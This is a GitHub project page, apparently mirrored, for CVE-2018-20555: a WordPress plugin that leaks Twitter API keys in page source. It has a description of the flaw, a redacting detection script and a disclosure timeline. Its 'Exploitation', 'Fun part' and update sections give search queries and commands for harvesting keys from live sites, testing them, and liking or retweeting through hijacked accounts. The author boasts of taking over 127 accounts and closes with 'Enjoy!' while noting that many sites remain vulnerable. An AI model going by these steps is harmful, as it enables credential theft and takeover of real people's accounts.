
fs0c131y / Cve 2018 20555

Social Network Tabs Wordpress Plugin Vulnerability - CVE-2018-20555

Programming Languages

python
139335 projects - #7 most used programming language

Projects that are alternatives of or similar to Cve 2018 20555

Wprecon
WPrecon (WordPress Recon), is a vulnerability recognition tool in CMS Wordpress, developed in Go and with scripts in Lua.
Stars: ✭ 135 (+73.08%)
Mutual labels:  wordpress, wordpress-plugin, vulnerability, cve
Faraday
Faraday introduces a new concept - IPE (Integrated Penetration-Test Environment) a multiuser Penetration test IDE. Designed for distributing, indexing, and analyzing the data generated during a security audit.
Stars: ✭ 3,198 (+4000%)
Mutual labels:  infosec, vulnerability, cve
Esfileexploreropenportvuln
ES File Explorer Open Port Vulnerability - CVE-2019-6447
Stars: ✭ 595 (+662.82%)
Mutual labels:  infosec, vulnerability, cve
Vulnerability Data Archive
With the hope that someone finds the data useful, we periodically publish an archive of almost all of the non-sensitive vulnerability information in our vulnerability reports database. See also https://github.com/CERTCC/Vulnerability-Data-Archive-Tools
Stars: ✭ 63 (-19.23%)
Mutual labels:  vulnerability, cve
Wordpress Zero Spam
The WordPress Zero Spam plugin makes blocking spam a cinch without all the bloated options. Just install, activate, and say goodbye to spam.
Stars: ✭ 56 (-28.21%)
Mutual labels:  wordpress, wordpress-plugin
Wp Rest Api Log
WordPress plugin for logging REST API requests and responses
Stars: ✭ 58 (-25.64%)
Mutual labels:  wordpress, wordpress-plugin
Images Via Imgix
imgix WordPress plugin
Stars: ✭ 51 (-34.62%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Base Plugin
A starter template for WordPress plugins, with autoloading, namespaces and object caching (where available).
Stars: ✭ 65 (-16.67%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Progressive Web Apps
WordPress Mobile Plugin including a Progressive Web App implemented with React
Stars: ✭ 64 (-17.95%)
Mutual labels:  wordpress, wordpress-plugin
Wp Gistpen
A self-hosted alternative to putting your code snippets on Gist.
Stars: ✭ 67 (-14.1%)
Mutual labels:  wordpress, wordpress-plugin
Mainwp Child
The MainWP Child plugin is installed on the WordPress sites that you want to control from the MainWP Dashboard.
Stars: ✭ 74 (-5.13%)
Mutual labels:  wordpress, wordpress-plugin
Better Rest Endpoints
A WordPress plugin that serves up slimmer WP Rest API endpoints.
Stars: ✭ 56 (-28.21%)
Mutual labels:  wordpress, wordpress-plugin
Wl Bootstrap
Integrating Laravel into WordPress
Stars: ✭ 54 (-30.77%)
Mutual labels:  wordpress, wordpress-plugin
Theme My Login
Home of the Theme My Login plugin for WordPress.
Stars: ✭ 60 (-23.08%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Cloud Media Offloader Plugin
A simple plugin that allows you to serve your WordPress Media Library files from the Backblaze B2 cloud storage service.
Stars: ✭ 52 (-33.33%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Indieweb
Helps you establish your IndieWeb identity by extending the user profile to provide rel-me and h-card fields. It also includes a bundled installer for a core set of IndieWeb-related plugins.
Stars: ✭ 64 (-17.95%)
Mutual labels:  wordpress, wordpress-plugin
Query Monitor
The Developer Tools Panel for WordPress
Stars: ✭ 1,156 (+1382.05%)
Mutual labels:  wordpress, wordpress-plugin
Wordpress Plugin Installer
A PHP class for installing and activating WordPress plugins.
Stars: ✭ 69 (-11.54%)
Mutual labels:  wordpress, wordpress-plugin
Ossf Cve Benchmark
The OpenSSF CVE Benchmark consists of code and metadata for over 200 real life CVEs, as well as tooling to analyze the vulnerable codebases using a variety of static analysis security testing (SAST) tools and generate reports to evaluate those tools.
Stars: ✭ 71 (-8.97%)
Mutual labels:  vulnerability, cve
Bitcoin Wordpress Plugin
GoUrl Official Bitcoin Payment Gateway for Wordpress 3.5+ (or higher). Sell Products, Files, Digital Downloads, Membership on your website. Accept Bitcoin, Litecoin, Dogecoin, Darkcoin, Reddcoin, etc Payments Online. Use Pay-Per-Download, Pay-Per-Product, Pay-Per-Membership, Pay-Per-Page/Video-Access on your website. It is Easy!
Stars: ✭ 49 (-37.18%)
Mutual labels:  wordpress, wordpress-plugin

CVE-2018-20555

The WordPress plugin Social Network Tabs, made by the company Design Chemical, leaks the Twitter access_token, access_token_secret, consumer_key and consumer_secret of its users twice (once in the widget's JavaScript config and once in the query string of the dcwp_twitter.php URL), which leads to a takeover of their Twitter accounts.

This is caused by the following lines of code within the page where the Twitter widget is displayed:

jQuery(document).ready(function ($) {
	var config = {
		widgets: "twitter,facebook,youtube",
		twitterId: "[redacted]",
		facebookId: "[redacted]",
		youtubeId: "[redacted]",
		twitter: {
			url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
			title: "Latest Tweets",
			follow: "Follow",
			followId: "",
			limit: "10",
			retweets: true,
			replies: true,
			images: "thumb",
			consumer_key: "[redacted]",
			consumer_secret: "[redacted]",
			access_token: "[redacted]",
			access_token_secret: "[redacted]"
		},
	}
});
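A site owner can verify whether their own rendered pages expose the plugin's credentials the way the snippet above does. The following checker is an added example, not code from the CVE-2018-20555 repository: it looks for the four credential fields in the widget config and for the dcwp_twitter.php URL whose query parameters carry the second copy of the keys, and reports only redacted values so the report itself never republishes a secret. The sample HTML and all key values in it are constructed and fake.

```python
import re
from urllib.parse import urlparse, parse_qs

# Credential fields the Social Network Tabs widget config is known to expose
# (field names taken from the leaked config shown above). Longest name first so
# "access_token_secret" is not split by the shorter "access_token" alternative.
SECRET_FIELDS = ("access_token_secret", "consumer_secret", "consumer_key", "access_token")

# Matches  consumer_key: "value"  inside the widget's JavaScript config.
FIELD_RE = re.compile(r'\b(' + '|'.join(SECRET_FIELDS) + r')\s*:\s*"([^"]*)"')

# Matches the plugin's dcwp_twitter.php URL; its query string is the second copy of the keys.
DCWP_URL_RE = re.compile(
    r'https?://[^"\'\s]*?/social-network-tabs/inc/dcwp_twitter\.php\?[^"\'\s]*'
)


def redact(value):
    """Keep only a short prefix so a report never contains a working secret."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 4)


def find_leaked_twitter_keys(html):
    """Return {field: redacted_value} for every populated credential field in the widget config."""
    found = {}
    for name, value in FIELD_RE.findall(html):
        if value and value != "[redacted]":
            found[name] = redact(value)
    return found


def dcwp_url_param_count(html):
    """Return how many non-empty query parameters the dcwp_twitter.php URL carries (0 if absent).

    The plugin passes the same four credentials as positional parameters 1..4, so four
    populated parameters means the keys are exposed in the URL as well as in the config."""
    match = DCWP_URL_RE.search(html)
    if not match:
        return 0
    params = parse_qs(urlparse(match.group(0)).query, keep_blank_values=False)
    return len(params)


def assess(html):
    """Summarise the exposure of one rendered page."""
    fields = find_leaked_twitter_keys(html)
    url_params = dcwp_url_param_count(html)
    return {
        "config_fields": fields,
        "url_params": url_params,
        "vulnerable": bool(fields) or url_params >= 4,
    }


# Constructed sample page mimicking the vulnerable widget output; every key value is fake.
SAMPLE_HTML = """
<script>
jQuery(document).ready(function ($) {
    var config = {
        widgets: "twitter",
        twitter: {
            url: "https://example.test/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=CKEYfake1234&2=CSECfake5678&3=ATOKfake9012-abc&4=ASECfake3456",
            consumer_key: "CKEYfake1234",
            consumer_secret: "CSECfake5678",
            access_token: "ATOKfake9012-abc",
            access_token_secret: "ASECfake3456"
        },
    }
});
</script>
"""

if __name__ == "__main__":
    report = assess(SAMPLE_HTML)
    for name, shown in report["config_fields"].items():
        print(f"config field {name} exposed: {shown}")
    print(f"dcwp_twitter.php URL parameters: {report['url_params']}")
    print("VULNERABLE" if report["vulnerable"] else "no credential exposure found")
```

Run it against the saved HTML of a page that embeds the Twitter widget (for example, `assess(open("page.html").read())`); any populated credential field or a dcwp_twitter.php URL with four parameters means the keys must be revoked in the Twitter developer console and the plugin removed or updated, since the values are readable by anyone who loads the page.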

Exploitation

Thanks to Publicwww, with the following search queries, I managed to retrieve the Twitter access_token, access_token_secret, consumer_key and consumer_secret from 539 vulnerable websites:

  • dcwp_twitter.php access_token_secret snipexp:|access_token: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|access_token_secret: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_key: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_secret: "([\w\d-._]+)"|

All the keys are available in twitter_keys.csv.

How to

Test the Twitter API keys in twitter_keys.csv

python test_twitter_api_keys.py -t

The first time I ran this command, I got the information of 446 Twitter accounts. It's worth mentioning that there were 2 verified accounts in the list and multiple accounts with more than 10K followers. All the vulnerable accounts are in vulnerable_accounts.txt.

Fun part

Like the tweet of your choice

python test_twitter_api_keys.py -l [tweet_id]

Retweet the tweet of your choice

python test_twitter_api_keys.py -r [tweet_id]

The first time I ran this command, I managed to like the tweet of my choice 127 times, which showed that 127 Twitter API keys had read/write rights, i.e. I was able to take over 127 Twitter accounts (change profile picture, like, retweet, change bio, ...) due to this key leak.

UPDATE 17/01/18

A lot of websites, and therefore Twitter accounts, are still vulnerable to this issue. In order to identify them, I created a scraper:

cd TwitterApiKeysSearchEngine/

scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10

The total number of results for this Google search query is 3550. Among the first 9 pages, I managed to retrieve 78 keys (86%). Enjoy!

Disclosure

  • 01/12/18: Disclosure to Twitter
  • 0X/12/18: Twitter deactivated all the keys
  • 11/12/18: Acknowledgement as a valid security issue by Twitter

Contact

Follow me on Twitter! You can also find a small part of my work at https://fs0c131y.com

Credits

The investigation and the POC have been made with ❤️ by @fs0c131y
